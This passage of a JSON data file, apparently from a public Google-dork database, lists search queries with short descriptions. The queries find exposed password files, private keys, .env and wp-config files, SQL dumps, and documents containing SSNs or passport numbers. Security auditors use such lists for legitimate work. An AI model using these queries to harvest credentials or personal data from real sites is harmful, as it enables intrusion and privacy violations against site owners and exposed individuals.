information.\r\n\r\nAlisson Moretto\r\nundeadsec.com"}, {"dork": "intitle:\"index of\" hosts.csv | firewalls.csv | linux.csv | windows.csv", "description": "Juicy info\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" users.csv | credentials.csv | accounts.csv", "description": "Good information, sometimes with passwords.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:scanned & documents intitle:\"index of\" IT", "description": "Juicy info, good for OSINT.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"/cgi-bin/WS_FTP.LOG\"", "description": "AUTHOR: FlyingFrog\r\n\r\nTwitter: @ItsKarl0z\r\n\r\n++ Find filed in cgi-bin directories ++\r\n\r\ninurl:\"/cgi-bin/WS_FTP.LOG\""}, {"dork": "intitle:\"index of\" \"hiberfil.sys\"", "description": "This file is a copy of the RAM, it will have the same size of the physical\r\nRAM and it will contain all the data and files of the running system before\r\nit hibernates.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:reports filetype:cache", "description": "intext:reports filetype:cache\r\n\r\nRegards,\r\nHussain vohra"}, {"dork": "inurl:pipermail filetype:txt", "description": "file containing emails..\r\n\r\nRegards\r\nHussain Vohra"}, {"dork": "inurl:/files/_log/ filetype:log", "description": "inurl:/files/_log/ filetype:log"}, {"dork": "inurl:_vti_bin/sites.asmx?wsdl | intitle:_vti_bin/sites.asmx?wsdl", "description": "# Google Dork: inurl:_vti_bin/sites.asmx?wsdl | intitle:_vti_bin/sites.asmx?wsdl\r\n# Description: Web Services Description Language file exposed to internet\r\n# Date: 2019-04-09\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "intext:[To Parent Directory] & ext:sql | ext:cnf | ext:config | ext:log", "description": "# Google Dork: intext:[To Parent Directory] & ext:sql | ext:cnf | ext:config | ext:log\r\n# Description: Google Dork useful to find Directory Listening containing sql,cnf,config and log files\r\n# Date: 2019-09-12\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "ext:txt | ext:sql | ext:cnf | ext:config | ext:log & intext:\"admin\" | intext:\"root\" | intext:\"administrator\" & intext:\"password\" | intext:\"root\" | intext:\"admin\" | intext:\"administrator\"", "description": "# Google Dork: ext:txt | ext:sql | ext:cnf | ext:config | ext:log & intext:\"admin\" | intext:\"root\" | intext:\"administrator\" & intext:\"password\" | intext:\"root\" | intext:\"admin\" | intext:\"administrator\"\r\n# Description: Google Dork to find default usernames and passwords\r\n# Date: 2019-09-12\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "\"passport\" filetype:xls site:\"*.edu.*\" | site:\"*.gov.*\" | site:\"*.com.*\" | site:\"*.org.*\" | site:\"*.net.*\" | site:\"*.mil.*\"", "description": "# Exploit Title: [Leaking Passport details]\r\n# Google Dork: [\"passport\" filetype:xls site:\"*.edu.*\" | site:\"*.gov.*\" | site:\"*.com.*\" | site:\"*.org.*\" | site:\"*.net.*\" | site:\"*.mil.*\"]\r\n# Date: [April 29 2019]\r\n# Exploit Author: [Neat - MrMeterpreter]"}, {"dork": "intext:\"@gmail.com\" AND intext:\"@yahoo.com\" filetype:sql", "description": "Exploit : Finds SQL dump files with gmail and yahoo email account.\r\n\r\nGoogle Dork : intext:\"@gmail.com\" AND intext:\"@yahoo.com\" filetype:sql\r\n\r\nExploit Author:- Jayson Zabate\r\nURL :- https://invalidwebsecurity.info/"}, {"dork": "intext:\"the WordPress\" inurl:wp-config ext:txt", "description": "*Dork: *\r\nintext:\"the WordPress\" inurl:wp-config ext:txt\r\n\r\n*Description:*\r\nWordPress Configuration files with .txt extension\r\n\r\n*Category:*\r\nFiles Containing Passwords"}, {"dork": "jmeter.log filetype:log", "description": "jmeter.log filetype:log\r\n\r\nTrace jmeter log files\r\n\r\nManhNho"}, {"dork": "\"php class JConfig\" AND inurl:configuration AND ext:\"bak | old | pdf | php | txt\"", "description": "Dork:\r\n\"php class JConfig\" AND inurl:configuration AND ext:\"bak | old | pdf | php | txt\""}, {"dork": "\"keyed alike\" site:gov filetype:pdf", "description": "Description: Find what city governments in the US are using keyed alike\r\npolice cruisers and miscellaneous types of locks.\r\n\r\nAuthor: edm0nd https://twitter.com/edmond_major"}, {"dork": "intext:\"config\" intitle:\"Index of .ssh\"", "description": "Description :\r\nSSH client config files\r\n\r\nDork :\r\nintext:\"config\" intitle:\"Index of .ssh\"\r\n\r\nAuthor :\r\nVipin Joshi(@vocuzi)"}, {"dork": "site:global.gotomeeting.com inurl:recording", "description": "Description: Find recorded meetings of people who used GoToMeeting for a\r\nconference call or meeting. You can also download the full recording.\r\nCategory: Files Containing Juicy Info\r\n\r\nAuthor: edm0nd https://twitter.com/edmond_major"}, {"dork": "inurl:github.com intext:.ftpconfig -issues", "description": "Description :\r\nAnother Atom ftpconfig dork, exposing sftp/ftp creds on Github\r\n\r\nDork :\r\ninurl:github.com intext:.ftpconfig -issues\r\n\r\nAuthor:\r\nVipin Joshi(@vocuzi)"}, {"dork": "filetype:inc php -site:github.com -site:sourceforge.net", "description": "Include files containing source code... and sometimes connection strings...\r\n\r\nGeneral Search:\r\n\r\nfiletype:inc php -site:github.com -site:sourceforge.net\r\n\r\nConnection Strings:\r\n\r\nfiletype:inc php AND mysqli|pdo -site:github.com -site:sourceforge.net"}, {"dork": "s3 site:amazonaws.com filetype:xls login", "description": "Excel files containing sensitive personal information stored on AWS S3\r\nbuckets\r\n\r\n*Google Dork*\r\n\r\ns3 site:amazonaws.com filetype:xls login\r\n\r\n*Dates: 30*-05-2019\r\n\r\n*Dork Author:* acc3ssp0int\r\n\r\n*Tested on:* any OS with a functioning browser running Google.com"}, {"dork": "intext:backup.sql intitle:index.of", "description": "SQL Backups."}, {"dork": "intext:user.sql intitle:index.of", "description": "Also intext:users.sql intitle:index.of"}, {"dork": "\"/FTPSVC2\" intitle:\"index of\"", "description": "Microsoft FTP server logs.\r\nYou can change the file last number to get more results: FTPSVC3, FTPSVC4\r\nand so on... Or (Not recommended) use\r\n\r\n\"/FTPSVC2\" | \"/FTPSVC3\" intitle:\"index of\"\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "intitle:\"index of\" \"W3SVC1\"", "description": "MS IIS log files.\r\n\r\nChange file name or it you want to search for more log\r\nfiles: W3SVC2, W3SVC3 and so on.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "s3 site:amazonaws.com filetype:sql", "description": "SQL Dumps stored on AWS S3 Buckets."}, {"dork": "inurl:old \"index of\" \"wp-config.php\"", "description": "Finds wp-config files on old defunct WordPress installations"}, {"dork": "DB_USERNAME filetype:env", "description": "# Exploit Title: Laravel Environment Configuration\r\n# Google Dork: DB_USERNAME filetype:env\r\n# Author: Francis Al Victoriano"}, {"dork": "site:https://docs.google.com/spreadsheets/d/ password", "description": "- `site:https://docs.google.com/spreadsheets/d/ password` \r\n- `site:https://docs.google.com/spreadsheets/d/ password email` \r\n- `site:https://docs.google.com/spreadsheets/d/ username` \r\n- `site:https://docs.google.com/spreadsheets/d/ ssn` \r\n- `site:https://docs.google.com/spreadsheets/d/ passport number`"}, {"dork": "site:https://docs.google.com/document/d/ password", "description": "- `site:https://docs.google.com/document/d/ password` \r\n- `site:https://docs.google.com/document/d/ password email` \r\n- `site:https://docs.google.com/document/d/ username` \r\n- `site:https://docs.google.com/document/d/ ssn` \r\n- `site:https://docs.google.com/document/d/ passport number`"}, {"dork": "intitle:\"index of\" unattend.xml", "description": "Files containing juicy info and sometimes passwords\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "MAIL_HOST filetype:env", "description": "# Exploit Title: Expose MAIL_HOST with credentials via Laravel Environment\r\n# Google Dork: MAIL_HOST filetype:env\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:\"paypal.log\" ext:log", "description": "# Exploit Title: Expose paypal.log in laravel logs storage\r\n# Google Dork: inurl:\"paypal.log\" ext:log\r\n# Author: Francis Al Victoriano"}, {"dork": "site:https://docs.google.com/forms responses", "description": "site:https://docs.google.com/forms responses \r\n\r\nDescription: \r\n\r\nThis dork allows to view form analytics and responses of generated\r\ngoogle forms"}, {"dork": "site:https://docs.google.com/forms viewanalytics", "description": "site:https://docs.google.com/forms viewanalytics \r\n\r\nDescription: \r\n\r\nThis dork allows you to view form analytics of generated google forms."}, {"dork": "site:https://docs.google.com/spreadsheets responses", "description": "# Exploit Title: Get all responses from Google Spreadsheet\r\n\r\n# Google Dork: site:https://docs.google.com/spreadsheets responses\r\n# Author: Francis Al Victoriano"}, {"dork": "site:https://docs.google.com/spreadsheets edit", "description": "site:https://docs.google.com/spreadsheets edit \r\n\r\nExploit Title: Get all editable spreadsheets of from google spreadsheet \r\n\r\nAuthor: Eliezer Rabadon"}, {"dork": "site:*.com intitle:\"Thank You For Your Order\" intext:Click Here to Download", "description": "# Google Dork : site:*.com intitle:\u201dThank You For Your Order\u201d intext:Click Here to Download\r\n# Author: Ayan Saha\r\n# Date: 21.07.2019\r\n# Tested on : Chrome"}, {"dork": "filetype:xls \"nomina\"", "description": "[*] Dork: filetype:xls \"nomina\"\r\n\r\n[*] Este dork, nos permite buscar archivos con informaci\u00f3n sensible de empresas, como por ejemplo nominas o datos de sus empleados.\r\n\r\n[*] This dork allows us to search for files with sensitive company information, such as payroll or employee data.\r\n\r\nDrok3r"}, {"dork": "inurl:/filedown.php?file=", "description": "# Google Dork: inurl:/filedown.php?file=\r\n# Author: Sayak Naskar\r\n# Date: 29.07.2019"}, {"dork": "intitle:\"Index of\" pass.txt", "description": "dork:\r\nintitle:\"Index of\" pass.txt\r\n\r\nAuthor:Mayur parmar\r\n\r\nInfo:\r\nit contains files that have pass.txt name\r\nsome juicy information"}, {"dork": "s3 site:amazonaws.com filetype:log", "description": "Sensitive Logs stored on AWS S3 bucket\r\n\r\n# Google Dork: s3 site:amazonaws.com filetype:log\r\n# Date: [1-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:robots.txt site:gov + intext:password", "description": "I have discovered a google dork which can be used to find all the URL's\r\nhaving robots.txt in it. As a filter, It will only show those websites\r\nwhich are related to the government and having content related to username\r\nand passwords in those files.\r\n\r\nDORK : inurl:robots.txt site:gov + intext:password"}, {"dork": "ext:sql intext:clave", "description": "# Google Dork: ext:sql intext:clave\r\n# Date: 2019-08-18\r\n\r\n# Author: Cristi Vlad\r\n\r\nThis search often returns accessible Spanish database dumps revealing\r\npotentially sensitive information."}, {"dork": "ext:sql intext:contrasena", "description": "Files Containing Juicy Info\r\nSpanish word for password. Regularly used in coding, projects or templates.\r\n\r\nNicolas Varona Sosa"}, {"dork": "site:*/phpinfo.php intitle:\"phpinfo()\"", "description": "Files containing Juicy info:\r\n\r\nsite:*/phpinfo.php intitle:\"phpinfo()\"\r\ninurl:/info.php intitle:\"phpinfo()\"\r\n\r\nReza ABasi(Turku)"}, {"dork": "site:docs.google.com inurl:forms | viewanalytics intext:see previous responses", "description": "Forms Containing Juicy Info\r\n\r\n# Google Dork: site:docs.google.com inurl:forms | viewanalytics intext:see previous responses\r\n# Date: [21-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:index.of.?.config.ini", "description": "Google Dork: intitle:index.of.?.config.ini\r\n\r\nCategory: Sensitive Directories\r\n\r\nDescription:\r\nUsed to find sensitive configuration file (config.ini) from the website\r\ndirectory, that contains database name, username & password\r\n\r\nAuthor: Midhun Biju"}, {"dork": "ext:sql intext:\"-- phpMyAdmin SQL Dump\" -site:github.*", "description": "Sensitive Directory,Files containing Passwords and Juicy info:\r\n\r\next:sql intext:\"-- phpMyAdmin SQL Dump\" -site:github.*\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/log/access_log", "description": "file containing juicy info:\r\n\r\nsite:*/log/access_log\r\nsite:*/logs/error_log\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"debian.cnf\"", "description": "Files Containing Password:\r\n\r\nintitle:\"index of\" \"debian.cnf\"\r\nintitle:\"index of\" \"db.conf\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/robots.txt intext:User-agent:", "description": "File containing juicy info:\r\n\r\nsite:*/robots.txt intext:User-agent:\r\nsite:*/robots.txt intext:\"# robots.txt\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/phpMyAdmin/robots.txt", "description": "Robots.txt file of site:\r\n\r\nsite:*/phpMyAdmin/robots.txt\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl: /config.txt ext:txt intext:", "description": "Google Dork: inurl: /config.txt ext:txt intext:"}, {"dork": "\"Scanned by Camscanner\" filetype:pdf", "description": "# Google Dork: \"Scanned by Camscanner\" filetype:pdf\r\n# Category: Files Containing Juicy Information\r\n# Author: Surya Teja Masanam\r\n# Date: 10-09-2018"}, {"dork": "site:*/sitemap/sitemap.xml", "description": "file containing juicy info:\r\n\r\nsite:*/sitemap/sitemap.xml\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/application/config/database.php*", "description": "Sensitive Directories and Juice Informations in open public Git/SVN\r\n\r\n@hex0x42424242"}, {"dork": "intitle:\"index of\" \"/mysql.log\"", "description": "files containing juicy info:\r\n\r\nintitle:\"index of\" \"/mysql.log\"\r\nintitle:\"index of\" \"mail.log\"\r\nsite:*/log/error.log\r\nintitle:\"index of\" \"ftp.log\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" inurl:/*sql* filetype:log", "description": "Google Dork: intitle:\"index of\" inurl:/*sql* filetype:log\r\nDate: 09/14/2019\r\nExploit Author: th3d3xt3r\r\nCategory: Files containing Juicy Info"}, {"dork": "intitle:\"index of\" \"debian.conf\"", "description": "*DORK: *intitle:\"index of\" \"ubuntu.conf\"\r\n*Author: Paras Arora(PAC Security)*\r\n*Date: 16 september 2019*\r\n*Category:* Ubuntu Conf files"}, {"dork": "site:ftp.*.* index of: manifest.xml", "description": "*Dork: *site:ftp.*.* index of: manifest.xml\r\n*Author: Deepak Kumar(PAC Security)*\r\n*DATE: 17 Sep 2109*\r\n*CATEGORY: Files containing juicy info*"}, {"dork": "index.of \"crossdomain.xml\"", "description": "Dork:\r\nindex.of \"crossdomain.xml\"\r\n\r\nAuthor:Mayur Parmar(th3cyb3rc0p)"}, {"dork": "site:*/*/conf/httpd.conf", "description": "Files Containing Juicy info:\r\n\r\nsite:*/*/conf/httpd.conf\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:credentials.txt -github -git -gitlab", "description": "This dork can use to find publicly available credentials files in short\r\ncategory of Files Containing Juicy Info.\r\n\r\nDhaiwat Mehta"}, {"dork": "site:*/logs/error.log", "description": "Error Pages:\r\n\r\nsite:*/logs/error.log\r\nsite:*/*/log/error.log\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/wp-settings.php", "description": "Files Containing Juicy info:\r\n\r\nsite:*/wp-settings.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"web.config.txt\"", "description": "Files Containing Juicy info:\r\n\r\nintitle:\"index of\" \"web.config.txt\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/.vscode/sftp.json\"", "description": "inurl:\"/.vscode/sftp.json\"\r\n\r\n-- \r\nMaxime Westhoven"}, {"dork": "inurl:\"/.vscode/ftp-sync.json\"", "description": "inurl:\"/.vscode/ftp-sync.json\"\r\n\r\n-- \r\nMaxime Westhoven"}, {"dork": "intitle:\"Index Of\" intext:sftp-config.json", "description": "intitle:\"Index Of\" intext:sftp-config.json\r\n\r\n-- \r\nMaxime Westhoven"}, {"dork": "site:*.freshservice.com/support/solutions", "description": "# Google Dork that Shows Interesting Information\r\n\r\n# Companies using Freshdesk's Freshservice sometimes accidentally leave their KBs/Solutions public when migrating from another ticketing\r\n\r\n# service. Some do not require login to see internal tech support solutions..\r\n\r\n# add intext:{whatever industry or term} for a more targeted approach.\r\n\r\nsite:*.freshservice.com/support/solutions\r\n\r\nAuthor: MiningOmerta"}, {"dork": "site:mypublicinbox.com intitle:email", "description": "Helps to locate public profiles of MyPublicInbox platform -there is no search form yet-. My Public Inbox is a new way of communication focused on experts of all sectors where they can facilitate their personal contact without exposing it against SPAM, phishing attacks\u2026 and so valuating their time. More info: (https://www.mypublicinbox.com) (https://www.elladodelmal.com/2019/10/mypublicinbox-un-proyecto-para-el-dia.html)\r\n\r\nGerard Fuguet"}, {"dork": "\"accounts.xlsx\" ext:xlsx", "description": "# Google Dork : \"accounts.xlsx\" ext:xlsx\r\n\r\n# Category : File contains Juicy items\r\n\r\n# Date : 03-11-2019\r\n\r\n# Author : Rohitreddy"}, {"dork": "intitle:index.of \"userpass.txt\"", "description": "Dork:\r\nintitle:index.of \"userpass.txt\"\r\n\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains key username and password text sensitive information."}, {"dork": "intitle:index.of \"credential.txt\"", "description": "Dork:\r\nintitle:index.of \"credential.txt\"\r\n\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains key credential text sensitive information."}, {"dork": "intitle:index.of \"key.txt\"", "description": "Dork:\r\nintitle:index.of \"key.txt\"\r\n\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains key clear text sensitive information."}, {"dork": "db_password filetype:env -site:github.com -git", "description": "# Google Dork : db_password filetype:env -site:github.com -git\r\n\r\n# Category : File contains Juicy items\r\n\r\n# Date : 05-11-2019\r\n\r\n# Author : Dhaiwat Mehta"}, {"dork": "intitle:\"index of\" inurl:ftp intext:logs", "description": "# Google Dork : intitle:\"index of\" inurl:ftp intext:logs\r\n\r\n# Category : File contains Juicy items\r\n\r\n# Date : 05-11-2019\r\n\r\n# Author : Dhaiwat Mehta"}, {"dork": "intitle:index.of \"private-key.pem\"", "description": "Dork:\r\nintitle:index.of \"private-key.pem\"\r\n\r\nAuthor: Pankaj Kumar Thakur (Nepal)\r\n\r\nInfo:\r\nIt contains Private RSA Keys."}, {"dork": "intitle:\"index of\" \"databases.yml\"", "description": "Files containing password:\r\n\r\nintitle:\"index of\" \"databases.yml\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:index.of \"access.conf\"", "description": "Dork:\r\nintitle:index.of \"access.conf\"\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains access.conf clear text sensitive information."}, {"dork": "intitle:\"index of\" \"ssh.yml\"", "description": "Files containing password:\r\n\r\nintitle:\"index of\" \"ssh.yml\"\r\nintitle:\"index of\" \"database-old.yml\"\r\nintitle:\"index of\" \"configuration.yml\"\r\nintitle:\"index of\" \"database.yml\"\r\nintitle:\"index of\" \"ftp.yml\"\r\n\r\nAuthor : Ismail Tasdelen"}, {"dork": "intitle:\"index of\" \"mail.log\"", "description": "Files containing juciy info:\r\n\r\nintitle:\"index of\" \"mail.log\"\r\nintitle:\"index of\" \"mail.err\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intext:\"@gmail.com\" ext:log", "description": "Files containing juicy nfo:\r\n\r\nintext:\"@gmail.com\" ext:log\r\n\r\nReza Abasi(Turku)"}, {"dork": "intext:\"@outlook.com\" ext:log", "description": "Files containing juicy nfo:\r\n\r\nintext:\"@outlook.com\" ext:log\r\nintext:\"@hotmail.com\" ext:log\r\n\r\nAuthor : Ismail Tasdelen"}, {"dork": "filetype:\"xls | xlsx | doc | docx | ppt | pptx | pdf\" site:gov \"FOUO\" | \"NOFORN\" | \"Confidential\"", "description": "*Google Dork:* filetype:\"xls | xlsx | doc | docx | ppt | pptx | pdf\" site:gov \"FOUO\" | \"NOFORN\" | \"Confidential\"\r\n\r\n*Description: *Files containing confidential information\r\n\r\n*Author: * shivaGprasadh"}, {"dork": "ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e", "description": "Exposed SQL DUMPS\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "Navicat MySQL Data Transfer filetype:sql", "description": "# Google Dork : Navicat MySQL Data Transfer filetype:sql\r\n# Category : Files Containing Juicy Info\r\n# Date : 10-12-2019\r\n# Author : Eka Syahwan"}, {"dork": "inurl:\"web.config\" & intext:\"Data Source\" & \"User ID\" & \"Password\" & \"connectionString\" & ext:config -git", "description": "##Google Dork: inurl:\"web.config\" & intext:\"Data Source\" & \"User ID\" & \"Password\" & \"connectionString\" & ext:config -git\r\n##Description: The above dork will show all the readable web.config files, which includes connection strings of database like server ip, database username, database password etc.\r\n## Submission date: 12/12/2019.\r\n## Author : Aamir Rehman.\r\n## Social : fb.com/yousafzian2"}, {"dork": "[ipn] ext:log", "description": "# Google Dork : [ipn] ext:log\r\n# Category : Sensitive Online Shopping Info\r\n# Date : 10-12-2019\r\n# Author : Eka Syahwan\r\n\r\nThis data contains a log of PayPal payments used by many websites."}, {"dork": "inurl:\"/fmi/webd\" intitle:\"FileMaker WebDirect\"", "description": "# Google Dork : inurl:\"/fmi/webd\" intitle:\"FileMaker WebDirect\"\r\n# Description: Find websites where Filemaker applications are saved. Users\r\ncan run them from the web browser. Some applications do not have user\r\nauthentication, allowing us to find sensitive data depending on the purpose\r\nof the application.\r\n# Category : Files Containing Juicy Info\r\n# Date : 17/12/2019\r\n# Author : Leandro Naranjo\r\n# Social: @tw1_lea"}, {"dork": "\"MailChimp API error:\" ext:log", "description": "# Google Dork: \"MailChimp API error:\" ext:log\r\n# Date: 12.28.2019\r\n# Author: Michael Meade"}, {"dork": "intitle:\"index of\" \"wp-security-audit-log\"", "description": "Files containing juicy info:\r\n\r\nintitle:\"index of\" \"wp-security-audit-log\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"_notes/dwsync.xml\"", "description": "# Google Dork: inurl:_notes/dwsync.xml\"\r\n\r\n# Date: 21-01-2020\r\n# Author: Marcelo Ruz S."}, {"dork": "\"fetchmailrc\" intitle:\"index of\" -linux", "description": "Fetchmail files containing juicy info and sometimes passwords\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" lesshsQ/ OR .lesshst/ -pool -pub", "description": "Less history file which can contain file names good to be used in social\r\nengineering.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" crontab.conf", "description": "Dork leading to a lot of juicy info\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" ticket.conf", "description": "Email info sometimes database dumps... Good luck! :)\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "-pub -pool intitle:\"index of\" db.key OR server.key OR ftp.key OR exchange.key OR host.key OR mail.key", "description": "This dork will give you a lot of private keys are also known as a secret\r\nkeys.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "krb.conf OR krb.realms intitle:\"index of\" -public -archive -packages -pub", "description": "Kerberos information like usernames and kerbero realms.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "accdb OR accde intitle:\"index of\" -pub -google -books", "description": "Dork gives Microsoft Access databases.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:env intext:APP_NAME", "description": "Google Dork: filetype:env intext:APP_NAME\r\nDescription: Find env file on laravel based website\r\ncontaining database username and password, email username & password\r\nCategory: File containing juicy information"}, {"dork": "intitle:index.of \"keys.txt\"", "description": "AUTHOR: CANCOM #RedTeam\r\n\r\n\r\n++ Find juicy files (API Keys, SSH Keys, Fileserver etc.) ++\r\n\r\nintitle:index.of \"keys.txt\"\r\n\r\nca. 400 Results"}, {"dork": "intitle:\"index.of\" intext:\"access.txt\"", "description": "AUTHOR: CANCOM #RedTeam\r\n\r\n\r\n++ find server logs and possible password/access files ++\r\n\r\nintitle:\"index.of\" intext:\"access.txt\"\r\n\r\nca. 500 Results"}, {"dork": "intitle:\"index.of\" intext:\"api.txt\"", "description": "AUTHOR: CANCOM #RedTeam\r\n\r\n\r\n++ find possible api key files ++\r\n\r\nintitle:\"index.of\" intext:\"api.txt\"\r\n\r\nca. 7300 Results"}, {"dork": "intext:\"SECRET_KEY\" ext|py inurl:mysite -site:stackoverflow.com -site:github.com", "description": "Dork:\r\nintext:\"SECRET_KEY\" ext|py inurl:mysite -site:stackoverflow.com -site:github.com\r\n\r\nDescription:\r\nThis dork queries google and finds the SECRET_KEY within python source code for django, focusing on mysite url.\r\n\r\nCategory:\r\nFiles Containing Juicy Info.\r\n\r\nAuthor:\r\nJadeWolf"}, {"dork": "intitle:index.of \"awsconfig.json\"", "description": "Find some AWS authentication configurations.\r\n\r\n-- \r\n*Hilary Soita.*"}, {"dork": "intitle:\"index of\" \"env.bak\"", "description": "Find env backup files.\r\n\r\n-- \r\n*Hilary Soita.*"}, {"dork": "intitle:\"index of\" \"smtp.log\"", "description": "*Dork:* intitle:\"index of\" \"smtp.log\"\r\n*Description:*\r\nIt finds SMTP logs\r\n\r\n*Author:* Magrabur Alam Sofily\r\nwww.linkedin.com/in/magrabur-sofily\r\n@masofily"}, {"dork": "intitle: index of \"*db.tar.gz\"", "description": "This dork found some juicy information about the db files.You can change\r\nthe extension another compress application extension.\r\n\r\nGoogle Dork : intitle: index of \"*db.tar.gz\"\r\n\r\nBerat Isler ( root1x )"}, {"dork": "intitle:\"index of/\" \"db.sql\"", "description": "Find database SQL files.\r\n\r\nGoogle Dork: intitle:\"index of/\" \"db.sql\"\r\n\r\nintitle:\"index of/\" \"db.sql\"\r\n\r\nBy Ishan Saha"}, {"dork": "intitle:index.of \"cacert.pem\"", "description": "Files Contain sensitive information.\r\n\r\nMalkit Singh"}, {"dork": "intitle:\"index of\" /\"privatekey.txt\" OR \"private key.txt\"", "description": "Hi,\r\n\r\nI have discovered this dork that can help us find private keys that are\r\nsaved in text file.\r\n\r\nJuveria Banu."}, {"dork": "intext:\"index of /\" \"auth.json\"", "description": "intext:\"index of /\" \"auth.json\"\r\n\r\nby\r\n\r\nSagar Banwa"}, {"dork": "intitle:\"index of\" \"php.ini\"", "description": "Files Containing Juicy info:\r\n\r\nintitle:\"index of\" \"php.ini\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"settings.py\"", "description": "files containing juicy info:\r\n\r\nintitle:\"index of\" \"settings.py\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" accounts.xml", "description": "pages containing juicy info:\r\n\r\nintitle:\"index of\" accounts.xml\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"access_token\"", "description": "Category : Files Containing Juicy Info\r\n\r\nintitle:\"index of\" \"access_token\"\r\n\r\nBy : Keval Sheth"}, {"dork": "intitle:\"index of\" \"backup.bak\"", "description": "Google Dorks Query to find backup files.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"backup.bak\"*"}, {"dork": "intitle:\"index of\" \"settings.yml\"", "description": "Google Dork Query to find out insecure and sensitve settings.yml metadata\r\nstored in YML format.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"settings.yml\"*"}, {"dork": "intitle:\"index of\" \"backup.yml\"", "description": "Google Dork Query to find out insecure and sensitive backup.yml metadata\r\nstored in YML format.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"backup.yml\"*"}, {"dork": "intitle:\"index of\" \"secrets.yml\"", "description": "Google Dork Query to find out insecure and sensitve secrets.yml metadata\r\nstored in YML format.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"secrets.yml\"*"}, {"dork": "intitle:\"index of\" database.yml", "description": "# Google Dork: \r\nintitle:\"index of\" database.yml\r\nintitle:\"index of\" database.yml.ci\r\nintitle:\"index of\" \"database-old.yml\"\r\n\r\n# By using this dork, sensitive directories and databases' username and\r\npassword can be found.\r\n\r\n# Date: 17/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"configuration.yml\"", "description": "# Google Dork: intitle:\"index of\" \"configuration.yml\"\r\n\r\n# By using this dork, files containing username and password can be found.\r\n\r\n# Date: 18/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"index of /\" \"token.yml\"", "description": "Description : intext:\"index of /\" \"token.yml\"\r\n\r\nThis google dork gives us the secret tokens and access tokens of\r\nmisconfigured servers."}, {"dork": "\"# Kickstart\" filetype:cfg", "description": "# Google Dork: # Kickstart filetype:cfg\r\n\r\n# By using this dork, kickstart configuration files that contain\r\ninteresting information and root passwords (hashed) can be found.\r\n\r\n# Date: 19/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:-cfg intext:\"password cipher\"", "description": "# Google Dork: inurl:-cfg intext:\"password cipher\"\r\n\r\n# By using this dork, passwords ciphers in configuration files can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"mysql.properties\"", "description": "This google dork gives us the mysq properties and sensitive details of\r\nmisconfigured servers."}, {"dork": "intext:\"dspace.cfg\" \"db.username = dspace\"", "description": "# Google Dork: \r\nintext:\"dspace.cfg\" \"db.username = dspace\"\r\nintext:\"dspace.cfg\" \"db.username = 